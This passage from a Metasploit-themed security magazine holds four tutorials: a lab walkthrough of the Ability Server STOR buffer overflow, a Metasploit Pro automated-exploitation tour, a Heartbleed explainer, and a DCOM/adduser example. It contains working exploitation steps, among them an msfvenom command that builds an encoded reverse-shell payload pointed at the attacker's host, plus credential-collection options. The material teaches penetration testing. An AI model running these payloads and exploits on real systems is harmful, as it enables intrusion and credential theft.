Metasploit for Exploits Development: the Tools Inside the Framework by Guglielmo Scaiola A lot of people use metasploit to gain access to hosts and networks, in ethical manner or not, in some case the operation is very simple, if you like the GUI versions, Rapid 7 professional or Armitage, for example, the attack is like a point and exploit activity, also the post exploitation task and the pivoting are very simple, but not all people know the fact that the framework born for ALL the exploit lifecycle, start with fuzzing tools and end with usable and integrated modules. Today I want to point my focus to this second aspect of the framework. I don’t want to teach you who you can write an exploit, but who you can you use the framework for do this, for this reason I start with a well know exploit, the Ability Server 2.34 STOR buffer overflow, who as the OSCP certification know very good this exploit, and a lot of PoC are on the Internet (http://wiki.bywire.org/Tutorials/Articles:Ability_Server_ Buffer_Overflow, http://www.youtube.com/watch?v=S0FcD35lkJg ), the today task is fuzzing and exploiting only with the metasploit tools. If you need more information of the exploit you can read this two websites: http://www.metasploit.com/modules/exploit/windows/ftp/ability_ server_stor, http://www.exploit-db.com/exploits/588/. If you search in the metasploit and metasploit/tools directories, you can find a lot of interesting piece of ruby…ok, let’s start watching the directories:
Figure 1. Metasploit framework directory
49
SECRETS OF METASPLOIT
Figure 2. The tools directory Today for my lab I use my favorite backtrack 5 R3 machine and an old virtual machine with installed Windows XP SP3 in Italian, this is very interesting because as you can see on metasploit.com, the target of the module are only: Exploit Targets 0 – Windows XP SP2 ENG 1 – Windows XP SP3 ENG In real world if you need to exploit this machine, you can’t only use the pre-existing module. The backtrack machine has IP 192.168.254.1 and the target has 192.168.254.11
Figure 3. My windows machine 50
SECRETS OF METASPLOIT In this machine I have installed (copied) the CodeCrafters Ability Server 2.34, if you don’t have you can find the file in Emule. When you start the server you need to bypass the freeware banner.
Figure 4. Ability Server: the freeware banner And you are in the menu
Figure 5. Ability Server: home Now I set up the username and the password (is also useful to flag Auto Activate).
Figure 6. Ability Server: configuration 51
SECRETS OF METASPLOIT Before starting with fuzzing is a good idea to test the connection between the two virtual machine, for do this you can use the command ftp: root@yamabushi:/CEH/sample scripts/D4# ftp ftp> open 192.168.254.11 Connected to 192.168.254.11. 220 Welcome to Code-Crafters – Ability Server 2.34. (Ability Server 2.34 by Code-Crafters). Name (192.168.254.11:root): ftp 331 Please send PASS now. Password: 230- Welcome to Code-Crafters – Ability Server 2.34. 230 User ‚ftp’ logged in. Remote system type is UNIX. Using binary mode to transfer files.
If you need to write your own fuzzer you need to know the command of this ftp server, you can use the ftp command help:
Figure 7. Connection with ftp server Ok, the ftp server works fine, now I want to start with fuzzing, I start the msfconsole and I start trying if the application is vulnerable, in msfconsole we have different fuzzers for different services. Because I want to find vulnerability in FTP server, I will use auxiliary/fuzzers/ftp/ftp_pre_post, this module can fuzz vulnerability in pre-auth phase, and also is able to fuzz post authentication commands (http://www. metasploit.com/modules/auxiliary/fuzzers/ftp/ftp_pre_post).
52
SECRETS OF METASPLOIT
Figure 8. Fuzzers
Figure 9. ftp_pre_post Now I load the module and I put the target data in the module: the target IP, the username and the password. use set set set
auxiliary/fuzzers/ftp/ftp_pre_post USER ftp PASS ftp RHOSTS 192.168.254.11/32
Figure 10. Setting ftp_pre_post
53
SECRETS OF METASPLOIT But if you show the options you can find a lot of other options, the most important, in this case, for time optimization is STARTASTAGE, with this options I can choose the stage of FTP which I want to analyze, • Issue no command, only send evil data • Fuzz the USER command • Fuzz the PASS command (after a valid USER command/login was executed) • Fuzz all FTP commands (after a valid login was performed), one command, one fuzz string per session • Fuzz all FTP commands (after a valid login was performed), one command with all fuzz combinations for that command per session Today I don’t want to try pre-auth phase and I will choose the stage 4. If you want to show the commands to fuzz in this stage you can type show advanced, for default the tools try all FTP commands, for this demo I will remove some commands to save time, with: set FtpCommands CWD STAT STOR
I try only CWD STAT and STOR… If you need more info on stage you can watch on the site: https://www. corelan.be/index.php/security/metasploit/simple-ftp-fuzzer-metasploit-module/, in this article I want also shorten the test setting the ENDSIZE to 2000 (the default value is 20000) and the STARTSIZE and the STEPSIZE to 20. Now you can start fuzzing with the command run, on the video you can see the command and the number of characters sent on target
Figure 11. Starting ftp_pre_post If the application is vulnerable, when the size of the payload reach the size of the stack, the server crash with an exception.
Figure 12. The crash – windows
54
SECRETS OF METASPLOIT At this moment the fuzzer stops working, you can see approximately the size required for crash the stack.
Figure 13. The crash – fuzzer If you go to the target, in the installation directory you can find the directory log, if you open the last log file you can see the payload sent by the fuzzer, this payload is a non-repetitive pattern of characters.
Figure 14. The crash – log Now you are sure which application is vulnerable…let’s start finding the offset and the return address, for do this I start the Ability Server with my favorite debugger, Immunity Debugger, if you prefer Olly or other debugger, no problem, the result will be the same ( I hope…).
Figure 15. Immunity Debugger
55
SECRETS OF METASPLOIT After crash you can copy the result of EIP, in our example 42326742
Figure 16. EIP and we can go to pattern_offset script for show the real offset, the sintax is pretty simple: ./patter_offset 42326742 the response is the offset for EIP, in our case 966… ok, now I have the offset…
Figure 17. Pattern_offset ADDENDUM
If you don’t use the fuzzer in the framework, but a script in phyton or other scripting languages, you can get a pattern with the script pattern_create, and after you can copy and paste the string in your script, when the application crashs, you can get the value in EIP frpom the devbugger and after you can use pattern_offset, the syntax is ./pattern_create number_of_char…in my example: ./pattern_create 2000
Figure 18. Pattern_create Now I need the return address for ending my exploit, I want to use only the framework today, and I will use Msfpescan, (you can find this value in others way, you can use the button “E” in your debugger for find the address in DLL, or you can use findjump2 in windows machines), msfpescan can find a lot of interesting information, today I search only a jump ESP, but if needed we can find other jump or pop pop ret, msfpescan can also trying to identify packers…before start the tool I need to put my DLL somewhere, I put the DLL in the /tmp directory, like the Offensive Security PWB course I use USER32.DLL, the sintax now is: ./msfpescan -j esp /tmp/user32.dll
The first address returned from the tool is 0x7e3a9353, this address haven’t double zero and look good. Now I am ready to make my exploit working, I have the offset, I have the Return Address, I need only the payload, if I want a stand alone exploit, let’s go…I can use msfvenom, or if I like legacy world, I can use msfpayload in pipe with msfencode….I prefer msfvenom, for better performance, but for educational purpose I show you also the syntax of msfpayload, in the example I want to get a reverse shell, but I want to use netcat as a listener, the correct payload is windows/shell_reverse_tcp: ./msfvenom -p windows/shell_reverse_tcp LHOST=192.168.254.1 -e x86/shikata_ga_nai -b’x00’ -i 5 -f c
56
SECRETS OF METASPLOIT The –p is the choosed payload, the LHOST is the listener host, the listener port is the default port tcp 4444, -e is the encoder, in this demo is shikata_ga_nai, with -b I don’t want bad-char 00, -i is for 5 iteration and –f is the format, C language in the example, the C format is good also for phyton script.
Figure 19. msfvenom If you want to do the same with old commands you can use this sintax: ./msfpayload windows/shell_reverse_tcp LHOST=192.168.254.1 R | ./msfencode -t c -e x86/shikata_ ga_nai -c 5,
It is really like to that of msfvenom, the R in msfpayload is for create a Raw payload, and the –c in msfencode is the same of –I in msfvenom
Figure 20. msfpayload and msfencode 57
SECRETS OF METASPLOIT And now you can copy and paste the shellcode in your script and start the listener… But today I don’t want any type of script, and I prefer to modify the metasploit module for Ability Server, in real life I think is better to copy the exploit before editing, but for educational purpose I will edit the original, the module is exploit/windows/ftp/ability_server_stor, the ruby code is located in /opt/metasploit/msf3/ modules/exploits/windows/ftp, with my preferred editor I will edit the module, adding windows XP SP3 ita…kate ability_server_stor.rb
Figure 21. Targets in metasploit modules I search the targets in the module, as you can see, in the module I have only two targets, I will add another one, I copy the section between the bracket and I substitute the old value with my discovered value, I put 7E3A9353 in RET, the offset is unchanged and I edit the title of the target…
Figure 22. New targets now I start the msfconsole and I try to exploit my windows machine, use set set set set
exploit/windows/ftp/ability_server_stor RHOST 192.168.254.11 TARGET 2 PAYLOAD windows/shell_reverse_tcp LHOST 192.168.254.1
58
SECRETS OF METASPLOIT
Figure 23. Settings the modified exploit Like in msfvenom my payload is a netcat-like reverse shell, let’s go try to p0wn the windows machine… exploit…
Figure 24. gotcha Well, all work is good… The porting of new exploit in metasploit is beyond the scope of my article and I stop here, but this is only the beginning, you can improve your skills with some interesting article for create your own metasploit modules, my favorite one is in corelan website from Peter Van Eeckhoutte: http://www.corelan.be/index. php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/, but you can find already excellent pages in the metasploit-unleashed site from Offensive Security: http://www.offensivesecurity.com/metasploit-unleashed/Porting_Exploits, http://www.offensive-security.com/metasploitunleashed/Exploit_Development.
About the Author
I work as I.T. Pro since 1987, I am a freelance consultant, pentester and trainer, I work especially in banking environment. Over the years I have achieved several certifications, including: MCT, MCSA, MCSE, Security +, Lead Auditor ISO 27001, ITIL, eCPPT, CEI, CHFI, CEH and ECSA. In 2011 I was awarded the “Ec-Council Instructor – Circle of Excellence.” I can be contacted at [email protected]
59
SECRETS OF METASPLOIT
Pentesting with Metasploit Pro by Cristian Stoica In this article we’ll have a look at Metasploit Pro. The starting point will be the installation and we’ll finish with the preparation of a report. What you will learn... • • • • • •
Setting up Metasploit Pro Defining a project Running a check on a specific target Validating the results Document findings Prepare a report
What you should know... • • • •
Networking Databases Operating system skills Mail servers, web servers and other services
Let’s start by understanding what does a penetration test or pentest actually mean. According to Wikipedia a pentest “is an attack on a computer system with the intention of finding security weaknesses, potentially gaining access to it, its functionality and data” If we look at NIST SP 800-53 Revision 4 they define penetration testing as “a test methodology in which assessors, typically working under specific constraints, attempt to circumvent or defeat the security features of an information system”. Penetration testing will help us identify threats, provide assurance to the organization, adopt and comply with legal requirements, best practice and last but not least will help an organization determine what must be done to prevent exploitation. There are two scopes of penetration testing: non-destructive and destructive tests. Do not engage in such activities without proper authorization and planning. Imagine what will be the result if you try this and end up running a one shot exploit which might render a business critical process unavailable. The first step will be to perform the installation process which is simple. Once the setup is completed we’ll need to access the platform via web in order to set the username, password and other optional info.
Figure 1. New User Setup 60
SECRETS OF METASPLOIT The following step will be activating the product.
Figure 2. Product Activation Once we’ve activated the product this will be confirmed in the next screen. Let’s make sure we have the latest version. For this we need to click on the Administration menu in the upper right corner and select Software Updates. In this case a new version was available.
Figure 3. Software update Since this is a new project, we’ll have to define it.
Figure 4. Adding a new project 61
SECRETS OF METASPLOIT For testing purposes Rapid7 is offering a virtual machine which can be downloaded to validate the features of Metasploit. Make sure your test lab is properly configured and it prevents unauthorized access. If you can hack it, somebody else can also and the last thing you need is to introduce a backdoor in your infrastructure. I shall skip the part where we configure the test lab so that we can focus on the functionalities of the software. Now that we have also a target it’s time to start defining the targets. The platform allows us to fine tune the process according to our needs.
Figure 5. Discovery We can even define if we need to scan for devices with SNMP management using a variety of community strings. There are other options available such as: scan hosts individually (this will result in a slower scanning process, however it will speed up the population of the database process), dry run. The discovery process can be customized to include credentials. Fine tuning of the web scanning settings can be performed also (maximum requests, time limit, concurrent requests).
Figure 6. Fine tuning the discovery process 62
SECRETS OF METASPLOIT Last but not least we can configure also the web crawler for basic authentication, seed the initial cookie request and change the HTTP user agent. After we’ve finished setting the discovery parameters it’s time to hit the Launch Scan button in the bottom right corner to start the task.
Figure 7. Discovery task running Once the process is completed we’re presented with a summary: number of hosts, services.
Figure 8. Discovery task completed Now it’s time to check if we can exploit some of the services discovered. In order to perform this task we simply have to click on the exploit button presented in Figure 8. Discovery task completed. The automated exploitation attempt configuration will be presented in the next screen. If we decide to target only one of the hosts discovered we can do that by leaving only that equipment in the target address. By default the reliability of the exploitation is set to great. Once more please note that this can render a service unavailable. There are several options in terms of reliability: excellent, great, good, normal, average, low.
Figure 9. Defining the automated exploitation settings 63
SECRETS OF METASPLOIT Of course there are several options available for fine tuning such as: • excluding target addresses, • payload settings • payload type: Meterpreter or command shell • connection type: automatic, bind (which is good for cases where NAT is available and all ports on the target system are not blocked) and reverse. • listener ports • listener host • auto launch macro • enable stage encoding for IPS evasion • exploit selection • included ports • excluded ports • skip exploits that do not match the host OS (we need to be careful since the OS fingerprinting might fail due to devices that are masking it) • advanced settings • concurrent exploits • timeout • transport evasion (each level applies different techniques: low is using delays in TCP packets, medium is sending small packets and high combines both) • application evasion • web application identification settings (HTTP basic authentication, initial cookie, user agent) After we have defined the required settings all we need to do is click on Exploit and let Metasploit work its magic. A review of the settings that were chosen will be presented at the beginning of the exploitation task that is running.
Figure 10. Attempting to exploit the hosts 64
SECRETS OF METASPLOIT During this process if an exploit is successful a new session is created and we’ll be able to see it in the Sessions menu. When the task is completed we can review the results.
Figure 11. Automated exploit task finished Since we have a session opened it’s time to collect some info and all we have to do is click on Collect button from Figure 10. Automated exploit task finished. Evidence we can collect: • Universal • System information • System passwords • *Nix Shell • SSH keys • Windows • Screenshots • Installed Applications • Drives • Logged on Users • Primary Domain • Collect other files (we need to define a filename pattern, maximum file count and maximum file size) After we have selected the information we require we need to click on the Collect System Data button. A new task is created in which we can see the progress and information about the data collected.
65
SECRETS OF METASPLOIT
Figure 12. Data collection task started Once the task is completed we can have a look at the host in order to see an overview of where we stand.
Figure 13. Overview host The information is grouped several tabs: services, sessions, vulnerabilities, credentials, captured data, notes, file shares, attempts and modules. The collected credentials will be added to a repository so that we can use them to try to gain access.
Figure 14. Host collected credentials Since we still have an active session we can even open and have shell access on that specific server.
66
SECRETS OF METASPLOIT Having direct shell access is basically giving us full unlimited control in terms on what we want to do with that system.
Figure 15. Shell access Metasploit is providing also the option to start a web application scan, perform a web application audit and exploit the web application. There are a number of predefined reports available including for PCI-DSS and FISMA compliance. Reports can be customized, new reports can be created.
Figure 16. Audit report 67
SECRETS OF METASPLOIT
Summary Metasploit has many features including Phishing Campaigns, Quick PenTest, Vulnerability Validation, Web App Testing all delivered in a very clean and simple format with just a few clicks. With the Pro version you get also Team Collaboration, VPN pivoting, Automation through Wizards, Social Engineering, Metasploit Pro API, Vulnerability Validation and many other interesting and useful features. You can use it as a standalone tool or start integrating it with different platforms from different vendors. It’s scalable, reliable and it comes in many versions which should cover existing needs.
About the Author
Cristian has a vast expertize in IT, Cyber Security, Risk Management, Governance. Currently he is the IT & Cyber Security Director for UTI Grup. He is actively involved in multinational security initiatives and alliances, acts as a certified trainer for IT & Security and is a speaker at various summits and events. Previously he has covered several senior management roles in the financial industry, telecommunication, security. His professional services were endorsed by governmental and private institutions. He’s involved in managing the development and implementation of the security strategy and global security policy, standards, guidelines and procedures to ensure ongoing maintenance of security and works with other executives to prioritize security initiatives and spending based on appropriate risk management and/or financial methodology, maintains relationships with law enforcement and other related government agencies. He currently holds certifications from: EC-Council: Certified EC-Council Instructor, C|CISO (Certified Chief Information Security Officer), Certified Ethical Hacker (CEH), Computer Hacking Forensic Investigator (CHFI) ISACA: CISA (Certified Information Systems Auditor), CISM (Certified Information Security Manager), CRISC (Certified in Risk and Information Systems Control), Mandiant: Advanced Malware Analysis, ISC2: SSCP, ISO 27001 Lead Auditor, IAEA & CNCAN: Information and Computer Security for Strategic and Critical Infrastructure, CISCO: CCAI, SonicWALL: CSSA, Symantec, IBM, McAfee, Veeam and other institutions and is certified in Security, Risk, Weapons and Ammunition, Strategic Management, Leadership and Managerial Communication. You can reach him at: https://linkedin.com/in/cristianstoica
68
SECRETS OF METASPLOIT
HeartBleed Bug Exploiting with Metasploit by Alessandro Parisi We’ll introduce the HeartBleed Bug (CVE-2014-0160), analyzing the impact on vulnerable server and the inherent attacking surface; then we’ll show how the Metasploit “OpenSSL Heartbeat (Heartbleed) Information Leak” module works and its use in penetration test scenarios. The bug consists in an implementation problem in OpenSSL library that provides cryptographic services such as SSL/TLS to applications and services, and it is not a design flaw in SSL/TLS protocol specification. OpenSSL versions affected by the bug are as follows: • OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable • OpenSSL 1.0.1g is NOT vulnerable • OpenSSL 1.0.0 branch is NOT vulnerable • OpenSSL 0.9.8 branch is NOT vulnerable Bug was introduced to OpenSSL in December 2011 and has been out in the wild since OpenSSL release 1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug. The problem exists in the handling of heartbeat requests, where a fake length can be used to leak memory data in the response allowing remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read. A buffer over-read happens when a program, while reading data from a buffer, overruns the buffer’s boundary and reads adjacent memory. Buffer over-reads can be triggered, as in the Heartbleed bug, by inputs that are designed to exploit a lack of bounds checking to read parts of memory not intended to be accessible.
The Heartbeat Extension and OpenSSL-Heartbleed Bug The Heartbeat Extension provides a new protocol for TLS allowing the usage of keep-alive functionality without performing a renegotiation. Heartbeat Extension for the Transport Layer Security (TLS) is defined in [RFC5246] and [RFC6347] and the adaptations to specific transport protocols are described in [RFC3436], [RFC5238], and [RFC6083]. To set up a TLS connection, a negotiation is needed and that’s relatively expensive in terms of time, due to the fact that several messages have to be exchanged between the client and server, before they can issue a trusted connection. The Heartbeat extension overrides these limitations sending “keep-alive” messages between client and server, so reducing the number of negotiations
70
SECRETS OF METASPLOIT The client sends a Heartbeat message consisting of a payload and a header containing the size of the payload: i.e. a Heartbeat request of size 5 and a text payload containing the string “Hello”. When the webserver gets that request, it saves the content of the payload in memory, as well as the size of the payload (5 bytes, in our example). Then, when the server sends a “keep-alive” response back to the client, the OpenSSL library reads the next 5 characters of memory starting from where it stored the payload and sends it back to the client (who checks that they received the right data back, the string “Hello” in our example) so keeping the connection alive. The Heartbeat implementation in the vulnerable OpenSSL library never checks that the payload size corresponds with the actual length of the payload sent by the client. So the client can freely input a size value up to 65535 (64 kilobytes) regardless of the true size of the payload. If an attacker sends a Heartbeat request saying the size is 65535, but a payload that’s only 1 byte long, the vulnerable server will store only 1 single byte in memory. However, the response will start with that single stored byte, but continue reading data from the next 64KB of server runtime memory, sending data read back to the client. This data could contain usernames and passwords, private keys, garbage memory, even the certificate that the webserver uses to state its identity. The attack can be repeated continously, extracting different parts of the webserver’s runtime memory at each iteration, and can be performed anonymously in an undetectable manner, as the attack can be issued early in the negotation process, before any webpage is served.
Impact and attacking surface of HeartBleed bug Netcraft has existimated that (http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trustedwebsites-vulnerable-to-heartbleed-bug.html) half a million widely trusted websites were found vulnerable to Heartbleed bug; among them, there were Facebook, Yahoo, Dropbox, Instagram. According to the NationalJournal (http://www.nationaljournal.com/tech/google-knew-about-heartbleedand-didn-t-tell-the-government-20140414) Google knew about the bug, but it didn’t alert anyone in the government. Neel Mehta, a Google engineer, first discovered “Heartbleed” in March 2014, while the Finnish security firm Codenomicon discovered the flaw around the same time. So Google was able to patch most of its services – such as email, search, and YouTube – before the bug was publicly disclosed on April 7th.
The Heartbleed bug in practice The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop communications, steal data directly from the services and users and to impersonate services and users. Basically, an attacker can grab 64K of memory from a server. The attack leaves no trace, and can be done multiple times to grab a different random 64K of memory. This means that anything in memory, from SSL private keys, to user keys, is vulnerable. In Figure 1 you can see depicted the normal usage of Heartbeat protocol and a malicious request:
71
SECRETS OF METASPLOIT
Figure 1. Credits to FenixFeather (Inkscape) [CC-BY-SA-3.0 (http://creativecommons.org/licenses/bysa/3.0)], via Wikimedia Commons
Metasploit OpenSSL Heartbeat Information Leak module The Metasploit Openssl Heartbleed module (available at: http://www.rapid7.com/db/modules/auxiliary/ scanner/ssl/openssl_heartbleed). supports several actions, allowing for scanning, dumping of memory contents, and private key recovery; we can use the Metasploit OpenSSL-Heartbleed module to exploit the bug, or to detect vulnerable systems, too. Before launching the module, update Metasploit to get the latest modules. Just type “msfupdate” at a command prompt, as in Figure 2:
Figure 2. msfupdate 72
SECRETS OF METASPLOIT Now run “msfconsole” to start Metasploit console, next search for the heartbleed module typing “search heartbleed”,as in Figure 3:
Figure 3. Search heartbleed At the command prompt, now type “use auxiliary/scanner/ssl/openssl_heartbleed“(Figure 4) to actually load the module, and then type “show options” to get a list of available mobule options:
Figure 4. Use auxiliary/scanner/ssl/openssl_heartbleed We only need to set just a few options: “set RHOSTS” to set the target IP address, then “set RPORT” to set the server listening port, optionally “set VERBOSE” to true, and finally type “run” the launch the exploit as in Figure 5, where you can see the output of a successful exploitation conducted against a vulnerable server:
Testing for Heartbleed vulnerability without exploiting the server A modified version of the Metasploit module has been released by David Chan, Mozilla Security Engineer (available at: http://blog.mozilla.org/security/2014/04/12/testing-for-heartbleed-vulnerability-withoutexploiting-the-server/); the modified Metasploit module neither accesses sensitive data nor impacts service performance, and it is aimed at helping organizations conduct safe testing for Heartbleed vulnerabilities. While there is a higher chance of a false positive, this test should be safe to use against critical services.
73
SECRETS OF METASPLOIT
Figure 5. Source: https://community.rapid7.com/servlet/JiveServlet/showImage/38-6607-4042/heartbleedremote-example.png
About the Author
Dr. Alessandro Parisi, Ethical Hacker, Big Data Scientist, Business Strategist An IT Professional for over 15 years, specialising in Ethical Hacking, Big Data Analytics and Business Strategy. Master Degree in Statistics and Econometrics, I also qualify as Business Strategist, covering overall implications of Innovation and Knowledge Management process in complex organizations. Blog: http://www.hackingwisdom.com | WebSite: http://www.startithub.com
74
SECRETS OF METASPLOIT
Exploit a Vulnerability with Metasploit by Azza NAFTI Companies invest in Security Program to protect their infrastructures, in order to identify vulnerabilities in the system, and thus avoid serious data breaches. A penetration test is one of the most effective ways to identify weaknesses and gaps in these programs. This test attempts to bypass security mechanisms, in other words Penetration Tester is able to identify ways in which an attacker might be able to compromise the organization and damage to the organization as a whole.
Why Metasploit? Metasploit is an open source tool for the development and execution of exploits (malicious software) against a remote machine, it allows to carry out audits in security, test and develop his own exploits. Originally created in Perl programming language, Metasploit Framework has been completely rewritten in Ruby language. It is often used by system administrators to test the vulnerability of computer systems to protect them, or by hackers for the purpose of piracy.
Terminology First, define some terms:
Exploit An exploit is the means by which a hacker or penetration tester takes advantage of a vulnerability in a system, applicsation or service. An attacker uses an exploit to attack a system and the result of this attack leads to enforcement of codes of this feat as the developer had planned.
Payload This is the code that will be executed after being introduced into the target machine. The payloads are delivered by the Framework, for example, reverse shell is a payload that creates a connection between the target machine that the attacker who referred to it a DOS command prompt, while bind shell is a payload that connects a command prompt to a listening port on the target machine, it stays there listening patiently waiting for the hacker to connect it.
The steps of exploit a system The basic steps for exploit a system are: • Choose and configure an exploit • Check if the target system is referred sensitive to exploit selected. • Choose and configure a payload • Select the encoding technique to encode the payload so that systems do not detect prejudices. • Run exploit.
75
SECRETS OF METASPLOIT
From theory to practice: Attack on Windows XP The target is a Windows XP. We will use «dcom» an exploit based on an RPC flaw. We compile it: gcc exploit.c. Having specified no parameter to GCC compiled the file named «a.out». The first parameter is the target system. The second is the IP of the victim. So we retrieves the IP of our client (cmd => ipconfig) and like this the exploit worked and we have access to the target shell and are placed on the desktop of the victim. In exploit which we have used with Metasploit we could change the payload (the Windows shell) by the desired Start msfconsole. After a few seconds you will see a «msf>» console. Do a search on the exploit previously used «dcom» with the «search» command. When the results appear use the exploit found with «use». By making a «show options» we see that lack for example «RHOST» he is the target. Then we choose our «payload»: SET PAYLOAD / windows / adduser Repeating a «show options» now we see the payload parameters (user / pass = metasploit). This means that the payload will add a user «metasploit». Test run the exploit with the command «exploit». The user has been created!
Conclusion We saw how easy it was to exploit a vulnerability with metasploit. It only remains to wish you good luck in its use.
About the Author Graduated in Computer Science and Quality. She works at Cassiopae MEA as Technical Consultant since 2010. Contact: [email protected].
76
U P D AT E NOW WITH
STIG
AUDITING
IN SOME CASES
nipper studio
HAS VIRTUALLY
REMOVED the
NEED FOR a
MANUAL AUDIT CISCO SYSTEMS INC. Titania’s award winning Nipper Studio configuration auditing tool is helping security consultants and enduser organizations worldwide improve their network security. Its reports are more detailed than those typically produced by scanners, enabling you to maintain a higher level of vulnerability analysis in the intervals between penetration tests. Now used in over 45 countries, Nipper Studio provides a thorough, fast & cost effective way to securely audit over 100 different types of network device. The NSA, FBI, DoD & U.S. Treasury already use it, so why not try it for free at www.titania.com
www.titania.com